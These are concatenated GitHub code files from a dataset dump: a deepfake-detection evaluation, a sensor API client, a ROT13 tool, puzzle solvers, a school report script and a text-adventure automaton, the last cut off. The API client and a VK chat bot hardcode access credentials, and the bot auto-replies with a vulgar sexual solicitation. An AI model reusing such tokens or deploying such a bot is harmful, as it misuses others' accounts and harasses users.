self).build(input_shape)\n\n def call(self, inpt_x):\n x, A = inpt_x\n x_diag = x\n for i in range(25-1):\n x_diag = K.concatenate([x_diag, x], axis=2)\n x_diag_channals = x_diag\n x_diag_channals = K.expand_dims(x_diag, axis=3)\n x_diag = K.expand_dims(x_diag, axis=3)\n for i in range(3-1):\n x_diag_channals = K.concatenate([x_diag_channals, x_diag], axis=3)\n \n x_mask = x\n width = 25\n for w in range(width-1):\n x_mask = K.concatenate([x_mask, x], axis=2)\n x_mask_channals = x_mask\n x_mask_channals = K.expand_dims(x_mask, axis=3)\n x_mask = K.expand_dims(x_mask, axis=3)\n for i in range(3-1):\n x_mask_channals = K.concatenate([x_mask_channals, x_mask], axis=3)\n\n a_part = multiply([x_diag, A])\n a_part = self.alpha * a_part\n\n b_part = self.beta * x_mask_channals\n\n ans = Add()([a_part, b_part])\n return ans\n\n def compute_output_shape(self, input_shape):\n return (input_shape[0][0], 300, 25, 3)\n\ndeeprhythm_path = \"/DATASET/__saika_data/analysis/model/ablation_model/sa_pa_ta_ma_e2e_0.9775.h5\"\nmodel = load_model(deeprhythm_path, custom_objects={'multiply':multiply, 'Add':Add, 'X_plus_Layer':X_plus_Layer})\n\ndata_meso_dir = \"/DATASET/__saika_data/dfdc/model_result/Meso/\"\ndata_stmap_dir = \"/DATASET/__saika_data/dfdc/stmap/\"\n\nprint(\"DeepRhythm ... \")\n\nmeso_data = []\nstmap_data = []\ny_data = []\nfor methname in [\"method_A\", \"method_B\", \"original_videos\"]:\n\n if methname in [\"method_A\", \"method_B\"]:\n y_lbl = 1\n else:\n y_lbl = 0\n\n mesomethpath = data_meso_dir + methname + '/'\n stmethpath = data_stmap_dir + methname + '/'\n\n vidlist = os.listdir(mesomethpath)\n vidlist.sort()\n for vidname in vidlist:\n meso = np.load(mesomethpath + vidname)\n meso = np.resize(meso, (300, 1))\n stmap = np.load(stmethpath + vidname[:-4] + \".avi.npy\")\n\n meso_data.append(meso)\n stmap_data.append(stmap)\n y_data.append(y_lbl)\n\nmeso_data = np.array(meso_data)\nstmap_data = np.array(stmap_data)\ny_data = np.array(y_data)\n\nscore, acc = model.evaluate([stmap_data, meso_data], y_data,\n batch_size=32)\nprint(\"DeepRhythm: {}\".format(acc))\n\nmeso_data = []\nstmap_data = []\ny_data = []","repo_name":"tsingqguo/deeprhythm","sub_path":"evaluate_DeepRhythm.py","file_name":"evaluate_DeepRhythm.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"73"} +{"seq_id":"23001783122","text":"import requests\nimport xml.etree.ElementTree as etree\nfrom datetime import datetime\n\n\ndef test():\n print('Agritronics...')\n\n \ndef GetLastData(network_id,node_id,io_number):\n script_path = '/ws/get.php?' \n time=''\n url = 'http://'+server+script_path+'appkey='+appkey+'&p='\\\n + network_id+','+node_id+','+io_number\n print(url)\n page = requests.get(url)\n root = etree.fromstring(page.content)\n io=root.find('IO')\n if io is None :\n return time\n\n time=io.find('LastIODateTime').text \n value=io.find('LastValue').text\n \n return time,value\n\ndef GetDailyData(network_id,node_id,io_number,date):\n server = 'agritronics.nstda.or.th'\n appkey = '0c5a295bd8c07a080d5306'\n script_path = '/ws/get.php?'\n times=[]\n values=[]\n url = 'http://'+server+script_path+'appkey='+appkey+'&p='\\\n + network_id+','+node_id+','+io_number+','+date\n print(url)\n page = requests.get(url)\n root = etree.fromstring(page.content)\n io=root.find('IO')\n if io is None :\n return times,values\n for d in io.findall('Data'):\n t=d.find('IODateTime').text\n v=float(d.find('Value').text)\n times.append(t)\n values.append(v)\n return times,values\n\n #4010,A,20/12/04,14:05:00,7,100,0.0\ndef PrepareDataForUpload(time_s,value_s) :\n node_id='4010'\n log_type='A'\n io_number='100'\n data_str=''\n i=0\n for ts_str in time_s :\n ts_dt = datetime.strptime(ts_str, '%Y-%m-%d %H:%M:%S')\n date_str=ts_dt.strftime('%y/%m/%d')\n time_str=ts_dt.strftime('%H:%M:%S')\n line_str = F\"{node_id},{log_type},{date_str},{time_str},7,{io_number},{value_s[i]}\\n\" \n #print(line_str)\n data_str=F\"{data_str}{line_str}\"\n i=i+1\n\n return data_str\n\n\n\ndef PrepareDataForUpload(node_id,io_number,time_s,*n) :\n log_type='A'\n data_str=''\n i=0\n for ts_str in time_s :\n ts_dt = datetime.strptime(ts_str, '%Y-%m-%d %H:%M:%S')\n date_str=ts_dt.strftime('%y/%m/%d')\n time_str=ts_dt.strftime('%H:%M:%S')\n line_str = F\"{node_id},{log_type},{date_str},{time_str},7,{io_number}\"\n for value_s in n :\n line_str+=F\",{value_s[i]}\" \n line_str+=\"\\n\"\n #print(line_str)\n data_str=F\"{data_str}{line_str}\"\n i=i+1\n\n return data_str\n\n\n\n#curl -F uploadedfile=@data.txt -F network=DURIAN-01 http://agritronics.nstda.or.th/webpost0606/log_webpost.php\ndef UploadData(network_id,data_str):\n url= 'http://agritronics.nstda.or.th/webpost0606/log_webpost.php'\n\n files={\n 'uploadedfile': ('data.txt', data_str),\n }\n data={\n 'network' : (network_id)\n }\n \n res = requests.post(url,files=files,data=data)\n #print(res.request.headers)\n #print(res.request.body)\n print(res.text)\n return\n\ndef UploadPicture(network_id,node_id,io_number,time_stamp,file) :\n url='http://agritronics.nstda.or.th/webpost0606/log_imgcap.php'\n \n ts_str=time_stamp.strftime('%Y%m%d%H%M%S')\n \n file_name = F\"{ts_str}__{network_id}__{node_id}__{io_number}.jpg\"\n print(file_name)\n files={\n 'uploadedfile':(file_name, file)\n }\n data={\n 'network' : (network_id),\n 'filedatetime' : (ts_str)\n }\n \n #res = requests.post(url,files=files,data=data)\n #print(res.request.headers)\n #print(res.request.body)\n #print(res.text)\n\n return\n","repo_name":"khongpan/DurianIrrigation","sub_path":"lib/agritronics.py","file_name":"agritronics.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"70752432555","text":"# -*- coding: utf-8 -*-\n\n__author__ = \"Yngve Mardal Moe\"\n__email__ = \"yngve.m.moe@gmail.com\"\n\n\ndef squares_by_comp(n):\n return [k**2 for k in range(n) if k % 3 == 1]\n\n\ndef squares_by_loop(n):\n data = []\n for k in range(n):\n if k % 3 == 1:\n data.append(k**2)\n return data\n\n\nif __name__ == '__main__':\n if squares_by_loop(20) != squares_by_comp(20):\n print('ERROR!')\n","repo_name":"yngvem/INF200-2019-Exercises","sub_path":"src/YOUR_NAME_ex/ex01/comp_to_loop.py","file_name":"comp_to_loop.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"73"} +{"seq_id":"32825762653","text":"import vk_api\nimport time\n\ntoken = '00fe30963f90c3b59b84d70826591d579aaaad1e3fa5e81d3ad520da0abf4659dfd0d3879e67ef9c6a219'\nvk = vk_api.VkApi(token=token)\nvk._auth_token()\n\n\ndef hello():\n person_name = messages[\"profiles\"][0]['first_name']\n print(person_name)\n vk.method(\"messages.send\", {\"peer_id\": person_id, \"message\": person_name})\n\n\nwhile True:\n try:\n messages = vk.method('messages.getConversations', {'offset': 0, 'count': 20, 'filter': 'unanswered', \"extended\":1})\n if messages['count'] >= 1:\n person_id = messages['items'][0]['last_message']['from_id']\n body_of_message = messages['items'][0]['last_message']['text']\n\n if body_of_message.lower() == 'привет':\n hello()\n else:\n vk.method(\"messages.send\", {\"peer_id\": person_id, \"message\": 'ОТСОСУ ЗА 100, пиши в лс'})\n\n\n\n except Exception as E:\n time.sleep(1)\n","repo_name":"PankillerG/Public_Projects","sub_path":"Programming/PycharmProjects/untitled/апрол.py","file_name":"апрол.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"7203883726","text":"# Popularity Contest\n\n# Edge cases\n# N (2≤N≤1000), the number of your friends,\n# M (0≤M≤N(N−1)/2), the number of friendships.\n# 1 ≤ a ≠ b ≤ N, denoting that the a’th and b’th of your friends are friends.\n\n# Input Section: friends and number of friendships\nM, N = 0, 0\ncondition_met = False\nwhile not condition_met:\n first_line = input().split(' ')\n N = int(first_line[0])\n M = int(first_line[1])\n if 2 <= N <= 1000 and 0 <= M <= (N*(N-1)/2):\n condition_met = True\n\n# Creating popularity_score array\npopularity_score = [0] * N\n\n# Collecting pairs\nfor x in range(M):\n pair = input().split(' ')\n a = int(pair[0])\n b = int(pair[1])\n if 1 <= a <= N and 1 <= b <= N and a != b:\n popularity_score[a-1] += 1\n popularity_score[b-1] += 1\n\n# Print output in a single line\nfor x in range(1, N+1):\n print(popularity_score[x-1] - x, end=\" \")\n","repo_name":"alexandreclalex/CompProg","sub_path":"lab1/popularity-contest/PopularityContest.py","file_name":"PopularityContest.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"74476850794","text":"# -*- coding: utf-8 -*-\n\"\"\"Algorythm for shortest path of knight.\"\"\"\nfrom breath_first_search.chessboard import Chessboard\nfrom breath_first_search.exeptions import InvalidMove\nfrom breath_first_search.component_system import log_function_call\nfrom collections import deque\nimport logging\nimport sys\n\nlogging.basicConfig(level=logging.DEBUG)\nLOGGER = logging.getLogger(__name__)\n\n\nclass ShortestPathKnight(Chessboard):\n \"\"\"Class for the shortest path of knight.\"\"\"\n\n def __init__(self, file) -> None:\n \"\"\"Constructor of ShortestPathKnight.\n\n :param file: file with chessboard\n :rtype: None\n \"\"\"\n Chessboard.__init__(self, file=file)\n self.knight_moves: list = [(2, 1), (1, 2), (-1, -2), (-2, -1), (-2, 1), (-1, 2), (1, -2), (2, -1)]\n self.size: int = len(self.chessboard)\n\n @log_function_call\n def breath_first_search(self) -> str:\n \"\"\"Method for breath first search.\n\n :return: number of steps to reach end position\n :rtype: str\n \"\"\"\n queue = deque([self.start])\n self.chessboard[self.start[0]][self.start[1]] = 0\n\n while queue:\n row, col = queue.popleft()\n\n if (row, col) == self.end:\n return self.chessboard[row][col]\n\n for d_row, d_col in self.knight_moves:\n new_row, new_col = row + d_row, col + d_col\n\n if self._is_valid_move(new_row, new_col):\n queue.append((new_row, new_col))\n self.chessboard[new_row][new_col] = self.chessboard[row][col] + 1\n queue.append((new_row, new_col))\n else:\n LOGGER.error(\"No path found\")\n sys.exit(1)\n\n def _is_valid_move(self, row: int, col: int) -> bool:\n \"\"\"Helper method that check's if the move is valid.\n\n :param row: row of chessboard\n :param col: column of chessboard\n :return: True if move is valid\n :return: False if move is not valid\n :rtype: bool\n \"\"\"\n try:\n return 0 <= row < self.size and 0 <= col < self.size\n\n except InvalidMove:\n LOGGER.error(\"Invalid move\")\n sys.exit(1)\n","repo_name":"Yggdrasill501/knights_path","sub_path":"breath_first_search/shortest_path.py","file_name":"shortest_path.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"14234196105","text":"#*********************FUNCTIONS******************************\nimport string\n\ndef ROT13(string):\n \"\"\"\n DOCUMENTATION DOWN BELOW\n Функция для шифрования строки по алгоритму rot13.\n \n Аргумент функции 'string' - исходная строка\n \n return возвращает искомую строку \n \"\"\"\n\n def roter(ch):\n i = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'.find(ch)\n if i != -1:\n return 'NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm'[i]\n else:\n return ch\n\n return \"\".join(map(roter, string))\n\n\t\n#EXAMPLES \n#print('\\n',ROT13('sbbone rttfcnz')) #foobar eggspam\n#print('\\n',ROT13('Hayrff rkcyvpvgyl fvyraprq')) #Unless explicitly silenced\n#print('\\n',ROT13('Gung jnl znl abg or boivbhf ng svefg hayrff lbh\\'er Qhgpu'),'\\n') #That way may not be obvious at first unless you're Dutch\n\ndef inputChekcer(userInput = \" \", type = str):\n\t\"\"\"\n\tDOCUMENTATION DOWN BELOW\n\tФункция для проверки ввода через тип \n\t\"\"\"\n\twhile (1):\n\t\ttry:\n\t\t\tinp = type(input(userInput))\n\t\t\tbreak;\n\t\texcept ValueError:\n\t\t\tprint(\"\\n\\t\\t\\t\\tInput error\")\n\treturn inp\n\ndef en_de_crypt_file():\n\tspase = \"\\n\\n\"\n\ttry:\n\t\tfilePath = inputChekcer(\"\\tinput the path : \",str)\n\t\tjustFile = open(filePath, \"r\")\n\t\tmessage = ROT13(justFile.read())\n\t\tjustFile = open(filePath, \"w\")\n\t\tjustFile.write(ROT13(message)) #исходное сообщение\n\t\tjustFile.write(spase)\n\t\tjustFile.write(message) #перекодированнoе сообщение\n\t\tprint ('\\n\\t\\t\\tDecoding welldone!\\n\\n\\n')\n\texcept OSError:\n\t\tprint(\"\\tfailed opening the file for reading\")\n\tfinally: \n\t\tjustFile.close()\n\t\n\t\n#***********************PROGRAMM*******************************\n \nif __name__ == \"__main__\":\n\timport test_ROT13\n\tassert test_ROT13.test_vice_versa(ROT13)\n\t\n\tprint(\"\\n\\n\\t\\t\\t1) encrypt/decrypt file\")\n\tprint(\"\\t\\t\\t2) encrypt/decrypt string\")\n\tprint(\"\\t\\t\\t3) exit\")\n\n\twhile (1):\n\t\tchecker = inputChekcer( \"\"\" input: \"\"\", str)\n\t\tif checker == \"1\":\n\t\t\ten_de_crypt_file()\n\t\telif checker == \"2\":\n\t\t\tprint(ROT13(inputChekcer(\"\\tInput the string: \",str)))\n\t\telif checker == \"3\":\n\t\t\texit()\n\t\telse:\n\t\t\tprint(\"\\tInput error. Repeat once again\") \n","repo_name":"herzenuni/sem3-rot13-311017-vonkuptschino","sub_path":"ROT13.py","file_name":"ROT13.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"43601515141","text":"\"\"\"\nScript written to get school wise count of 11th & 12th students studying\nBiology, Pure Science, Computer Science, Computer Application, Computer Technology\nin Chengalpattu and Chennai districts\n\nHoping this script will be useful in future by editing some of the parameters\n\"\"\"\n\nimport utilities.utilities as utilities\n\n\n# File path to the report\nfile_path = r'/home/rabboni/Downloads/Grpwise-Mediumwise-Report.xlsx'\ngeog_classification_file_path = r'/home/rabboni/Documents/EMIS/Data Reporting/reports/schools_urban_rural_classfication.xlsx'\n\n\ndef dist_class_group_filtered_students_count():\n \"\"\"\n Function to filter the groupwise data of all school students\n district wise, class wise, group wise.\n \"\"\"\n\n # Districts to filter\n districts = ['CHENGALPATTU', 'CHENNAI']\n # School types to filter\n school_types = ['Government']\n # Groups to filter\n groups = [2503, 2608, 2502, 2702, 2802]\n # Columns to save\n columns = ['DistrictName', 'BlockName', 'EduDistrictName', 'UDISE',\t'SchoolName', 'SchoolType', 'GroupCode', 'GroupName', 'Medium', 'Cls_11_Total', 'Cls_12_Total']\n\n # Load the report as a pandas data frame object\n df_grp_wise_rpt = utilities.read_sheet(file_path, 'Report')\n\n # Filter districts\n df_grp_wise_rpt_filtered_dist = utilities.filter_dataframe_column(df_grp_wise_rpt, 'DistrictName', districts)\n\n # Filter by group codes\n df_grp_wise_rpt_filtered_dist_grp = utilities.filter_dataframe_column(df_grp_wise_rpt_filtered_dist,'GroupCode', groups)\n\n # Filter by school type\n df_grp_wise_rpt_filtered_dist_grp_schl = utilities.filter_dataframe_column(df_grp_wise_rpt_filtered_dist_grp,'SchoolType', school_types)\n\n \n df_grp_wise_rpt_for_save = utilities.columns_subset(df_grp_wise_rpt_filtered_dist_grp_schl, columns)\n\n # Rename columns for better readability\n df_grp_wise_rpt_for_save.rename(columns = {'Cls_11_Total':'Class 11 students','Cls_12_Total':'Class 12 students'}, inplace = True)\n\n # Save the modified data frame to excel\n utilities.save_to_excel(df_grp_wise_rpt_for_save, 'school_grp_student_count.xlsx', 'Report')\n\n\ndef low_student_count(student_count_threshold, location_classification, class_column_name, desired_col_name, file_name):\n \"\"\"\n Function to get data of schools where students in a group are less than a given threshold number\n The data is filtered to given location classification: Urban/Rural\n \"\"\"\n\n # School types to filter\n school_types = ['Government']\n # Columns to save\n columns = ['DistrictName', 'BlockName', 'EduDistrictName', 'UDISE',\t'SchoolName', 'SchoolType', 'GroupCode', 'GroupName', 'Medium', 'Cls_12_Total']\n \n\n # Load the data containing Rural/Urban classification of schools as a data frame object\n df_geo_classif = utilities.read_sheet(geog_classification_file_path, 'location_classification')\n\n # Filter schools with given location classification\n df_geo_filtered = utilities.filter_dataframe_column(df_geo_classif, 'Location', [location_classification])\n\n # Load the group wise report as a pandas data frame object\n df_grp_wise_rpt = utilities.read_sheet(file_path, 'Report')\n\n # Filter by school type\n df_grp_wise_rpt_schl = utilities.filter_dataframe_column(df_grp_wise_rpt,'SchoolType', school_types)\n\n\n # Get the intersection of school data with goup wise report and schools with location_classification\n df_geo_classif_merged = df_grp_wise_rpt_schl.merge(df_geo_filtered[['UDISE', 'Location']])\n\n # Get the schools whose students in a group/class is less than the given threshold\n df_lower_than_threshold = utilities.filter_column_le(df_geo_classif_merged, class_column_name, student_count_threshold)\n\n # Select a subset of columns to save for final report\n df_lower_than_threshold_for_save = utilities.columns_subset(df_lower_than_threshold, columns)\n\n # Rename column for better readability\n df_lower_than_threshold_for_save.rename(columns = {class_column_name:desired_col_name}, inplace = True)\n\n # Save the modified data frame to excel\n utilities.save_to_excel(df_lower_than_threshold_for_save, file_name, 'Report')\n\n\n\n\n\n\n# Main function to call the specific function\ndef main():\n \n # Function that count of students in schools filtered district, class & group wise\n #dist_class_group_filtered_students_count()\n\n low_student_count(30, 'Urban', 'Cls_12_Total', 'Class 12 Students', 'urban_schools_le_30_student_strength.xlsx')\n low_student_count(15, 'Rural', 'Cls_12_Total', 'Class 12 Students', 'rural_schools_le_15_student_strength.xlsx')\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"RabboniRabi/reports_automation","sub_path":"reports_automation/ad_hoc/groupwise_student_total.py","file_name":"groupwise_student_total.py","file_ext":"py","file_size_in_byte":4630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"42806162915","text":"class Solution:\n def getLucky(self, s: str, k: int) -> int:\n base=ord(\"a\")-1\n lst=[str(ord(item)-base) for item in s]\n cur=\"\".join(lst)\n for i in range(k):\n acc=0\n for item in str(cur):\n acc+=int(item)\n cur=acc\n return cur\n","repo_name":"lkwq007/leetcode-py","sub_path":"1945-Sum-of-Digits-of-String-After-Conve.py","file_name":"1945-Sum-of-Digits-of-String-After-Conve.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"73"} +{"seq_id":"13942107759","text":"ar=[]\nn=int(input())\ns=input().split(\" \")\nfor i in s:\n\tar.append(int(i))\nmax=[]\nfor i in range(len(ar)):\n\tcount=0\n\tfor j in range(i+1,len(ar)):\n\t\tcount+=1\n\t\tif(ar[i]==ar[j]):\n\t\t\tmax.append(count)\nif(len(max)==0):\n\tprint(\"-1\")\nelse:\t\t\t\n\tprint(min(max))","repo_name":"rishi772001/Competetive-programming","sub_path":"Hackerrank/minimum dist.py","file_name":"minimum dist.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"73"} +{"seq_id":"12762572510","text":"from pyformlang.finite_automaton import (\n DeterministicFiniteAutomaton as DFA,\n State as st,\n Symbol as sb,\n)\nfrom model.Transducer import Transducer as FST\nimport re\n\n\nclass Automaton(object):\n def __init__(self):\n self.names = self.initialize_names()\n self.states = self.set_up_states()\n self.final_states = self.set_up_final_states()\n self.automaton = self.set_up_automaton()\n self.regular_expressions = {}\n self.set_regular_expressions()\n\n def __str__(self) -> str:\n pass\n\n def contains_state(self, state):\n return state in self.states\n\n def set_names(self, names):\n for n in names:\n self.names.append(n)\n\n def set_states(self, states):\n for s in states:\n self.states.append(s)\n\n def accepts(self, input):\n return self.automaton.accepts(input)\n\n def to_regex(self):\n return self.automaton.to_regex()\n\n def to_dict(self):\n return self.automaton.to_dict()\n\n def is_final_state(self, state):\n return self.automaton.is_final_state(state)\n\n def is_start_state(self, state):\n return self.automaton.start_state == state\n\n def get_state(self, state_name):\n for pk in self.states:\n if pk.value == state_name:\n return pk\n\n def get_final_state(self, state_name):\n for pk in self.final_states:\n if pk.value == state_name:\n return pk\n\n def get_index_of_state(self, state_name):\n state = self.get_state(state_name)\n return self.states.index(state)\n\n def get_index_of_final_state(self, state_name):\n state = self.get_final_state(state_name)\n return self.final_states.index(state)\n\n def set_regular_expressions(self):\n nod_dict = self.to_dict()\n states = []\n for pk, val in nod_dict.items():\n for k in val.keys():\n states.append(k)\n\n regex_patterns = []\n for i in [\n re.compile(r\".*(explorar|costa).*\", re.IGNORECASE),\n re.compile(r\".*(refugiar|bosque|buscar).*\", re.IGNORECASE),\n re.compile(r\".*(investigar|cueva).*\", re.IGNORECASE),\n re.compile(r\".*(avanzar|playa).*\", re.IGNORECASE),\n re.compile(r\".*(construir|choza).*\", re.IGNORECASE),\n re.compile(r\".*(noche|pasar|vela).*\", re.IGNORECASE),\n re.compile(r\".*(encontrar|mapa|antiguo).*\", re.IGNORECASE),\n re.compile(r\".*(despertar|criatura|durmiente).*\", re.IGNORECASE),\n re.compile(r\".*(descubrir|cofre|enterrado).*\", re.IGNORECASE),\n re.compile(r\".*(seguir|tribu|nativos).*\", re.IGNORECASE),\n re.compile(r\".*(encontrar|pistas|tesoro).*\", re.IGNORECASE),\n re.compile(r\".*(accionar|extraña|palanca|palmera).*\", re.IGNORECASE),\n re.compile(r\".*(investigar|ruido|extraño|matorrales).*\", re.IGNORECASE),\n re.compile(r\".*(tratar|sobrevivir|noche).*\", re.IGNORECASE),\n re.compile(r\".*(cavar|x|arena).*\", re.IGNORECASE),\n re.compile(r\".*(inspeccionar|antes).*\", re.IGNORECASE),\n re.compile(r\".*(huir|cueva).*\", re.IGNORECASE),\n re.compile(r\".*(intentar|comunicar|criatura).*\", re.IGNORECASE),\n re.compile(r\".*(quedar|solo).*\", re.IGNORECASE),\n re.compile(r\".*(cofre|llevar|ambos).*\", re.IGNORECASE),\n re.compile(r\".*(intentar|negociar|jefa).*\", re.IGNORECASE),\n re.compile(r\".*(escapar|nativos).*\", re.IGNORECASE),\n re.compile(r\".*noche.*\", re.IGNORECASE),\n re.compile(r\".*(día|dia).*\", re.IGNORECASE),\n re.compile(\n r\".*(continuar|busqueda|búsqueda|buscar|tesoro).*\", re.IGNORECASE\n ),\n re.compile(r\".*(isla|permanecer|ermitaño).*\", re.IGNORECASE),\n re.compile(r\".*(buscar|comida).*\", re.IGNORECASE),\n re.compile(r\".*(entrar|otro).*\", re.IGNORECASE),\n re.compile(r\".*(acuerdo|beneficio).*\", re.IGNORECASE),\n re.compile(r\".*(robar|tratar|nativos).*\", re.IGNORECASE),\n re.compile(r\".*(esconder|embarcación|embarcacion).*\", re.IGNORECASE),\n re.compile(r\".*(correr|costa|desesperado|escapar).*\", re.IGNORECASE),\n ]:\n regex_patterns.append(i)\n\n tuplas = list(zip(states, regex_patterns))\n self.regular_expressions = dict(tuplas)\n\n def initialize_names(self):\n names = {\n \"Isla\": \"de los Secretos\",\n \"Playa\": \"de los Misterios\",\n \"Bosque\": \"de las Sombras\",\n \"Cueva\": \"de los Antiguos\",\n \"Choza\": \"Secreta\",\n \"Criatura\": \"Xelthor\",\n \"Lider\": \"Leilani\",\n \"Protagonista\": \"Silvanus\",\n }\n return names\n\n def set_up_states(self):\n states = []\n\n for s in [\n st(f\"Náufrago en la Isla {self.names['Isla']}\"), # q0\n st(f\"Playa {self.names['Playa']}\"), # q1\n st(f\"Bosque {self.names['Bosque']}\"), # q2\n st(f\"Cueva {self.names['Cueva']}\"), # q3\n st(f\"Orilla Despejada\"), # q4\n st(f\"Choza {self.names['Choza']}\"), # q5\n st(f\"Noche Tenebrosa\"), # q6\n st(f\"Tesoro Enterrado\"), # q7\n st(f\"Conversación con {self.names['Criatura']}\"), # q8\n st(f\"Cofre del pasado\"), # q9\n st(f\"Encuentro con los Nativos\"), # q10\n st(f\"Ruinas Misteriosas\"), # q11\n st(f\"Día Nuevo\"), # q12\n st(f\"Afuera de la cueva {self.names['Cueva']}\"), # q13\n st(f\"Acuerdo con los Nativos\"), # q14\n st(f\"Fuga Desesperada\"), # q15\n ]:\n states.append(s)\n return states\n\n def set_up_final_states(self):\n final_states = []\n\n for fn in [\n st(\n f\"Salvaje final: {self.names['Protagonista']} es atacado por animales salvaje\"\n ),\n st(\n f\"Devorado por la bestia: Era una bestia feroz, {self.names['Protagonista']} es devorado por ella\"\n ),\n st(\n f\"Regreso Triunfante: {self.names['Protagonista']} descubre el tesoro, es rescatado y regresa como héroe\"\n ),\n st(\n f\"Trampa mortal: {self.names['Protagonista']} Acciona accidentalmente una trampa mortal\"\n ),\n st(\n f\"Alianza inusual: {self.names['Protagonista']} Establece una comunicación inusual con {self.names['Criatura']} y logra salir de la isla en compañía de {self.names['Criatura']}\"\n ),\n st(\n f\"Ataque inesperado: {self.names['Protagonista']} es emboscado, atacado y asesinado por los nativos hostiles\"\n ),\n ]:\n final_states.append(fn)\n\n return final_states\n\n def modify_name(self, subject, new_name):\n current_name = self.names[subject]\n fst = FST(current_name)\n fst.change_transducer(new_name)\n translated_name = fst.translate(current_name)\n if translated_name is not None:\n self.names[subject] = translated_name\n self.states = self.set_up_states()\n self.final_states = self.set_up_final_states()\n self.automaton = self.set_up_automaton()\n self.set_regular_expressions()\n\n def set_up_automaton(self):\n temp = DFA()\n q = self.states\n qf = self.final_states\n\n q0_q1 = sb(f\"Explorar la costa\".replace(\" \", \"_\"))\n q0_q2 = sb(\n f\"Buscar refugio en el bosque {self.names['Bosque']}\".replace(\" \", \"_\")\n )\n\n q1_q3 = sb(f\"Investigar una cueva misteriosa\".replace(\" \", \"_\"))\n q1_q4 = sb(f\"Avanzar por la playa {self.names['Playa']}\".replace(\" \", \"_\"))\n\n q2_q5 = sb(f\"Construir una choza\".replace(\" \", \"_\"))\n q2_q6 = sb(f\"Pasar la noche en vela\".replace(\" \", \"_\"))\n\n q3_q7 = sb(f\"Encontrar un mapa antiguo\".replace(\" \", \"_\"))\n q3_q8 = sb(\n f\"Despertar a una criatura durmiente llamada {self.names['Criatura']}\".replace(\n \" \", \"_\"\n )\n )\n\n q4_q9 = sb(f\"Descubrir un cofre enterrado\".replace(\" \", \"_\"))\n q4_q10 = sb(\n f\"Seguir a una tribu de nativos liderada por la jefa {self.names['Lider']}\".replace(\n \" \", \"_\"\n )\n )\n\n q5_q11 = sb(f\"Encontrar pistas sobre el tesoro\".replace(\" \", \"_\"))\n q5_qfin1 = sb(f\"Accionar una extraña palanca en una palmera\".replace(\" \", \"_\"))\n\n q6_qfin2 = sb(\n f\"Investigar un ruido extraño proveniente de los matorrales\".replace(\n \" \", \"_\"\n )\n )\n q6_q12 = sb(\n f\"Tratar de sobrevivir a la noche desde un único punto\".replace(\" \", \"_\")\n )\n\n q7_qfin3 = sb(f\"Cavar en la X que hay en la arena\".replace(\" \", \"_\"))\n q7_qfin4 = sb(f\"Inspeccionar el lugar antes de cavar en la X\".replace(\" \", \"_\"))\n\n q8_q13 = sb(f\"Huir de la cueva {self.names['Cueva']}\".replace(\" \", \"_\"))\n q8_qfin5 = sb(\n f\"Intentar comunicarte con {self.names['Criatura']}\".replace(\" \", \"_\")\n )\n\n q9_qfin3 = sb(f\"Quedarse solo con el tesoro\".replace(\" \", \"_\"))\n q9_qfin4 = sb(f\"Llevarse el tesoro y el cofre\".replace(\" \", \"_\"))\n\n q10_q14 = sb(\n f\"Intentar negociar con la jefa {self.names['Lider']}\".replace(\" \", \"_\")\n )\n q10_q15 = sb(f\"Escapar sigilosamente de los nativos\".replace(\" \", \"_\"))\n\n q11_qfin1 = sb(f\"Explorar las ruinas de noche\".replace(\" \", \"_\"))\n q11_qfin6 = sb(f\"Explorar las ruinas de día\".replace(\" \", \"_\"))\n\n q12_qfin3 = sb(f\"Continuar la búsqueda del misterioso tesoro\".replace(\" \", \"_\"))\n q12_qfin1 = sb(\n f\"Permanecer en la isla {self.names['Isla']} como ermitaño llamado {self.names['Protagonista']}\".replace(\n \" \", \"_\"\n )\n )\n\n q13_qfin3 = sb(\n f\"Buscar comida alrededor de la cueva {self.names['Cueva']}\".replace(\n \" \", \"_\"\n )\n )\n q13_qfin4 = sb(\n f\"Tratar de entrar por el otro lado de la cueva {self.names['Cueva']}\".replace(\n \" \", \"_\"\n )\n )\n\n q14_qfin3 = sb(\n f\"Llegar a un acuerdo beneficioso con la jefa {self.names['Lider']}\".replace(\n \" \", \"_\"\n )\n )\n q14_qfin6 = sb(f\"Tratar de robar a los nativos\".replace(\" \", \"_\"))\n\n q15_qfin3 = sb(f\"Esconderse en una embarcación\".replace(\" \", \"_\"))\n q15_qfin6 = sb(\n f\"Correr hasta la costa en un intento desesperado por escapar\".replace(\n \" \", \"_\"\n )\n )\n\n temp.add_transitions(\n [\n (q[0], q0_q1, q[1]),\n (q[0], q0_q2, q[2]),\n (q[1], q1_q3, q[3]),\n (q[1], q1_q4, q[4]),\n (q[2], q2_q5, q[5]),\n (q[2], q2_q6, q[6]),\n (q[3], q3_q7, q[7]),\n (q[3], q3_q8, q[8]),\n (q[4], q4_q9, q[9]),\n (q[4], q4_q10, q[10]),\n (q[5], q5_q11, q[11]),\n (q[5], q5_qfin1, qf[0]),\n (q[6], q6_qfin2, qf[1]),\n (q[6], q6_q12, q[12]),\n (q[7], q7_qfin3, qf[2]),\n (q[7], q7_qfin4, qf[3]),\n (q[8], q8_q13, q[13]),\n 